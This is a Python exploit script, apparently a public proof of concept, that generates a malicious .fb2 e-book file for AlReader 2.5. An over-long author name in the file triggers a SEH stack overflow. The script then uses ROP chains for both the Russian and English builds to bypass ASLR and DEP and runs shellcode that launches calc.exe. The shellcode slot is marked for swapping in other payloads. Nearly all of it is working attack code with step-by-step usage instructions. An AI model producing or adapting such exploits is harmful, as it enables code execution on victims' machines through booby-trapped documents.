#!/usr/bin/env python
#*************************************************************************************************************
# Exploit Title: Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass)
# Date: 25.10.2015
# Category: Local Exploit
# Exploit Author: g00dv1n
# Contact: g00dv1n.private@gmail.com
# Version: 2.5
# Tested on: Windows XP SP3 / Windows 7 / Windows 8
# Vendor Homepage: http://www.alreader.com/index.php?lang=en
# Software Link (ENG): http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip
# Software Link (RU): http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip
# CVE:
# Description:
# Alreader 2.5 its free FB2 reader for Windows.
# FB2 format its just XML. FB2 contain <author> <first-name> </first-name> </author> block.
# Overflow occurs if you create a long name of the author.
# App used WCHAR (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two.
# For example 41 41 - 00 41 00 41
# So We should use UTF-16.
#
# Also, we can use single null byte in payload.
#
#
#
# Instructions:
# 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file.
# 2. Run Alreader.exe
# 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open )
# 4. Enjoy running Calc.exe
#
# Exploit owerview:
# For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW
# and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and
# run Shellcode.
#
# At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload
# ( It is necessary to adjust the offset in different systems .)
# Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP
# ( It is necessary to adjust the offset in different systems .)
# Then the control get ROP chain .
#
# Program have Russian (RU) and English (Eng) versions.
# ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions )
# For a combination of two versions into one exploit I place two ROP chains one after another.
# For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs )
# For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs arises yet another exepiton and Call ADD ESP, 808h.
# So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control.
# With these tricks, the exploit works correctly for both versions.
#
# Below is ANSI-diagram of the payload:
#
# =-------------------------=
# | gdvn | just fan magic bytes
# |-------------------------|
# | |
# | jmp from SEH adress | x 500 Spray Andress to Jump from oveeride SEH
# | | (ADD ESP, 808h RETN 4)
# |-------------------------|
# | |
# | ROP NOP | x 500 Spray ROP NOP (RETN)
# | |
# |-------------------------|
# | |
# | ROP chain for |
# | RU version |
# | |
# |-------------------------|
# | SHELLCODE | Run Calc.exe
# |-------------------------|
# | |
# | ROP NOP | x 250 Spray ROP NOP (RETN)
# | |
# |-------------------------|
# | |
# | ROP chain for |
# | ENG version |
# | |
# |-------------------------|
# | SHELLCODE | Run Calc.exe
# |-------------------------|
# | |
# | ROP chain for |
# | ENG version |
# | |
# |-------------------------|
# | |
# | |
# | Junk | 'A' x 6000
# | |
# | |
# =-------------------------=
#
#
#
#
#
#**************************************************************************************************************
#######################################################################################################
from struct import *
#######################################################################################################
file_result = "AlReader-fb2-PoC-exploit.fb2"
########################################################################################################
fuz_text = '' # init fuzzy string
jmp_to = pack('<I',0x00442391 ) # 0x00442391 ADD ESP, 808h RETN 4
ret_NOP = pack('<I',0x00448147 ) # RETN
##################################### START CREATE ROP CHAINs ############################################
fuz_text += 'gdvn' # magic init bytes
fuz_text += jmp_to * 500 # spray adr
fuz_text += ret_NOP * 500 # spray RETN adr
####################################### ROP CHAIN FOR RUS VERSION ########################################
# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr
# EBP = ptr to unicode 'kernel32.dll'
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC8FC ) # 0x004FC8FC GetModuleHandleW adr
kernel32_u = pack('<I',0x0560944 ) # 0x0560944 ptr to unicode 'kernel32.dll'
#0x004904a6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x004904a6 ) + module_handlew_adr + ret_adr_after + kernel32_u
fuz_text += '\x41' * 4
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
fuz_text += '\x41' * 28 # correct after ADD ESP,30
#Junk
#################################################
fuz_text += pack('<I',0x004f831c ) # 0x004f831c # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
#################################################
#EAX = kernel32 base adr
# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'
ret_adr_after = pack('<I',0x0048ddd1 ) # 0x0048ddd1 : # ADD ESP,30 # RETN ( this need to correct ESP )
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
# 0x004904A8 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x004904A8 ) + get_proc_adr + ret_adr_after
fuz_text += '\x41' * 8
fuz_text += pack('<I',0x004b9e9e ) # 0x004b9e9e : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
fuz_text += pack('<I',0x004b310d ) # 0x004b310d : # PUSHAD # RETN
fuz_text += 'VirtualProtect' + '\x00'
fuz_text += '\x41' * 17 # correct ESP pointer
########################################################
# Prepare registrs for Virtual protect call
# EDI = ROP NOP
# ESI = VirtualProtect adr
# EBP = Ret adr
# ESP = auto
# EBX = 1
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)
# Now in EAX VP adr
fuz_text += pack('<I',0x00489cdd ) # 0x00489cdd, # PUSH EAX # POP ESI # RETN
fuz_text += pack('<I',0x004a6392 ) # 0x004a6392, # POP EBX # RETN
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
fuz_text += pack('<I',0x004e7d31 ) # 0x004e7d31, # SUB EBX,5DE58BD0 # RETN # EBX = 1
fuz_text += pack('<I',0x004fc23c ) # 0x004fc23c, # XOR EDX,EDX # RETN # EDX = 0
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
fuz_text += pack('<I',0x0048c064 ) # 0x0048c064, # POP ECX # RETN
fuz_text += pack('<I',0x00629eea ) # 0x00629eea, # &Writable location
fuz_text += pack('<I',0x00487d6a ) # 0x00487d6a, # POP EDI # RETN
fuz_text += pack('<I',0x004f4401 ) # 0x004f4401, # RETN (ROP NOP)
fuz_text += pack('<I',0x004e6379 ) # 0x004e6379, # POP EBP # RETN
ret_adr_after = pack('<I',0x004f831c ) # ret adr # 0x004f831c # ADD ESP,24 # RETN
fuz_text += ret_adr_after
fuz_text+= pack('<I',0x004ecfab ) # 0x004ecfab, # PUSHAD # RETN
fuz_text += '\x41' * 32 # Correct poiter to ESP
fuz_text += pack('<I',0x004a37bd ) # 0x004a37bd : # jmp esp
fuz_text += '\x90' * 16 # NOP's :-)
##################################### END ROP CHAIN #########################################
#############################################################################################
#PASTE SHELLCODE HERE
# Run Calc
shellcode = ("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7");
fuz_text += shellcode
#############################################################################################
fuz_text += ret_NOP * 250 # spray RETN adr
#############################################################################################
############################### ROP CHAIN FOR ENG VERSION ###################################
# Prepare to call GetModuleHandleW
# EDI = GetModuleHandleW adr
# ESI = ret adr
# EBP = ptr to unicode 'kernel32.dll'
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
module_handlew_adr = pack('<I',0x004FC85C ) # 0x004FC85C GetModuleHandleW adr
kernel32_u = pack('<I',0x00560724 ) # 0x00560724 ptr to unicode 'kernel32.dll'
#0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x00488ed6 ) + module_handlew_adr + ret_adr_after + kernel32_u
fuz_text += '\x41' * 4
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
fuz_text += '\x41' * 28 # correct after ADD ESP,30
#Junk
#################################################
fuz_text += pack('<I',0x004a8ee8 ) # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += '\x41' * 36
#################################################
#EAX = kernel32 base adr
# Prepare to call GetProcAdress
# EDI = GetProcAdress adr
# ESI = ret adr
# EBP = kernel32 base adr
# ESP = ptr to ANSII 'VirtualProtect00'
ret_adr_after = pack('<I',0x004cad21 ) # 0x004cad21 : # ADD ESP,30 # RETN ( this need to correct ESP )
get_proc_adr = pack('<I',0x0043C8B2 ) # 0x0043C8B2 - GetProcAdress
# 0x00488ed6 : # POP EDI # POP ESI # POP EBP # POP EBX # RETN
fuz_text += pack('<I',0x00488ed6 ) + get_proc_adr + ret_adr_after
fuz_text += '\x41' * 8
fuz_text += pack('<I',0x004b9dfe ) # 0x004b9dfe : # XCHG EAX,EBP # SETE CL # MOV EAX,ECX # RETN
fuz_text += pack('<I',0x004b3ded ) # 0x004b3ded : # PUSHAD # RETN
fuz_text += 'VirtualProtect' + '\x00'
fuz_text += '\x41' * 17 # correct ESP pointer
########################################################
# Prepare registrs for Virtual protect call
# EDI = ROP NOP
# ESI = VirtualProtect adr
# EBP = Ret adr
# ESP = auto
# EBX = 1
# EDX = 0x40
# ECX = lpOldProtect (ptr to W address)
# Now in EAX VP adr
fuz_text += pack('<I',0x00489c3d ) # 0x00489c3d, # PUSH EAX # POP ESI # RETN
fuz_text += pack('<I',0x00481c40 ) # 0x00481c40, # POP EBX # RETN
fuz_text += pack('<I',0x5DE58BD1 ) # 0x5DE58BD0, # EBX = 5DE58BD1
fuz_text += pack('<I',0x004e7c91 ) # 0x004e7c91, # SUB EBX,5DE58BD0 # RETN # EBX = 1
fuz_text += pack('<I',0x004fc19c ) # 0x004fc19c, # XOR EDX,EDX # RETN
fuz_text += pack('<I',0x0040db04 ) * 64 # 0x0040db04, # INC EDX # ADD AL,3B # RETN x 64 # EDX = 0x40
fuz_text += pack('<I',0x004f39dc ) # 0x004f39dc, # POP ECX # RETN
fuz_text += pack('<I',0x0062909d ) # 0x0062909d, # &Writable location
fuz_text += pack('<I',0x00495df4 ) # 0x00495df4, # POP EDI # RETN
fuz_text += pack('<I',0x00483a02 ) # 0x00483a02, # RETN (ROP NOP)
fuz_text += pack('<I',0x004fb3c6 ) # 0x004fb3c6, # POP EBP # RETN
ret_adr_after = pack('<I',0x004a8ee8 ) # ret adr # 0x004a8ee8 # ADD ESP,24 # RETN
fuz_text += ret_adr_after
fuz_text+= pack('<I',0x004b3ded ) # 0x004b3ded, # PUSHAD # RETN
fuz_text += '\x41' * 32 # Correct poiter to ESP
fuz_text += pack('<I',0x004757a7 ) # 0x004757a7 : # jmp esp
fuz_text += '\x90' * 16 # NOP's :-)
fuz_text += shellcode
##############################################################################################
fuz_text += '\x41' * 6000 # final junk
################################ GENERATE utf-16 fb2 file ####################################
start = '''
<?xml version="1.0" encoding="unicode-utf_16"?>
<FictionBook xmlns="http://www.gribuser.ru/xml/fictionbook/2.0" xmlns:l="http://www.w3.org/1999/xlink">
<description>
<title-info>
<author>
<first-name>
'''
end = '''
<middle-name/>
<last-name/>
</author>
<book-title>EXPLOIT TEST</book-title>
</title-info>
</description>
</FictionBook>
'''
start_u = start.encode('utf-16')
end_u = end.encode('utf-16')
fout = open(file_result, 'wb')
fout.write(start_u)
fout.close()
fout = open(file_result,'ab')
fout.write(fuz_text)
fout.close()
fout = open(file_result,'ab')
fout.write(end_u)
fout.close()
print "[*] File successfully created !!\n\n"
